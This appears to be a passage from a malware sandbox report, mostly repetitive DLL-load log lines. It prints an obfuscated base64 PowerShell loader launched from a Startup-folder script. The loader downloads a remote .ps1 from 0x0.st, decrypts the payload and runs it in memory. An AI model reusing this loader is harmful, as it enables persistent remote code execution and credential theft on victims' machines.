Q2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
